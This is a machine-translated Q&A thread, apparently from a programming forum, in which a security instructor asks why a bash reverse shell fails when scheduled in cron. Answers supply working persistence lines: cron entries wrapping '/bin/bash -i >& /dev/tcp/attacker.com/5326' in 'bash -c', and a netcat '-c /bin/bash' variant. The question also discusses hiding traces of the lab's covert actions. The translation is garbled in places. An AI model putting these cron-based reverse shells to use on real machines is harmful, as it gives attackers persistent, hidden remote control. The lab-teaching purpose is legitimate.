Bash 反向 shell 命令 cron 作业不工作 - 我放弃了

Bash reverse shell command cron job not working - I give up

我在一所大学教授网络安全,并且正在编写一个关于 Netcat 和反向 shells 的实验室。我创建了一个 cron 作业,它 运行 是一个连接到我的监听器的脚本。那很好用。问题是指纹太多,脚本可以删除。实验室的一部分是秘密操作(比如在输入的任何命令前放置 space)。

我正在尝试执行此命令。现在频率并不重要,但最终它会 运行 在启动时和每 30 分钟一次。

/bin/bash -i >& /dev/tcp/attacker.com/5326 0>&1

当从命令行 运行 时,命令起作用并且反向 shell 成立。我不想使用端口 80,因为我 DO 希望在学生决定尝试一些愚蠢的事情时阻止它。此外,下一个实验室将在 iptables 上阻止此端口。

我试过引用。我试过须藤。末尾的双符号。单个&符号在末尾。 /tcp/ 路径的进一步限定。我认为我不需要确定它来自 运行 的哪个 tty 会话(那会很困难)。 cron-运行 命令在任何情况下都不会成功。

crontab -l

# Edit this file to introduce tasks to be run by cron.
# 
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
# 
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').# 
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
# 
# Output of the crontab jobs (including errors) is sent through
# email to the user the crontab file belongs to (unless redirected).
# 
# For example, you can run a backup of all your user accounts
# at 5 a.m every week with:
# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
# 
# For more information see the manual pages of crontab(5) and cron(8)
# 
# m h  dom mon dow   command
* * * * * /bin/bash -i >& /dev/tcp/attacker.com/5326 0>&1

这是系统日志

cat /var/log/syslog 

Mar 19 07:42:01 raspberrypi CRON[12921]: (pi) CMD (/bin/bash -i >& /dev/tcp/attacker.com/5326 0>&1)
Mar 19 07:42:01 raspberrypi CRON[12917]: (CRON) info (No MTA installed, discarding output)

它似乎没有失败......它只是不工作。

所以对于比我聪明的许多人来说,我做错了什么以及如何让这个命令作为 cron 作业工作(调用脚本不是一个选项)?

更新: 解决方案是 * * * * * /bin/bash -c 'bash -i >& /dev/tcp/attacker.com/5326 0>&1' 尽管有两个错误我仍在努力解决。

我怀疑您从命令行传递的 argv 数组中的内容与来自 cron 守护程序的内容不匹配。虽然我不能说出丢失的转义符是什么,但这里有一个通用的诊断方法:

void main(int argc, char **argv) {
  for( int i=0; i<argc; i++) 
    printf("%d: '%s'\n",i,argv[i])
}

如果你将其编译成二进制文件并运行在这两种情况下都使用你的参数你应该看到区别:

./a.out -i >& /dev/tcp/attacker.com/5326 0>&1

对比:

* * * * * /path/a.out -i >& /dev/tcp/attacker.com/5326 0>&1

如果不是 argv 的差异,>&0>&1 是否不会被命令行 bash 进程(而不是正在启动的进程)处理,并且适用于 bash shell 为 运行 以便攻击者二进制文件没有重定向,但其父进程有?

编辑:

F. Hauri 提出了一个很好的观点,但你可能想要在你的 crotab 中是:

* * * * * /bin/bash -c 'bash -i >& /dev/tcp/attacker.com/5326 0>&1'

(或者他们可以编辑他们的答案,/path/a.out 部分是错误的)

Edit2 - 捕获输出:

* * * * * /bin/bash -c 'bash -i >& /dev/tcp/attacker.com/5326 0>&1 >/path/to/logfile'

/dev/tcp bash主义

注意 /dev/tcp/host/port 是一个 bashism!

cron不会看懂!

你可以试试:

* * * * * /bin/bash -c '/bin/bash -i >& /dev/tcp/attacker.com/5326 0>&1'

或使用非bash方式:

使用 netcat 作为示例:

* * * * * /usr/bin/nc -c /bin/bash\ -i attacker.com 5326 0>&1

(参见 man nc.traditionalman nc.openbsd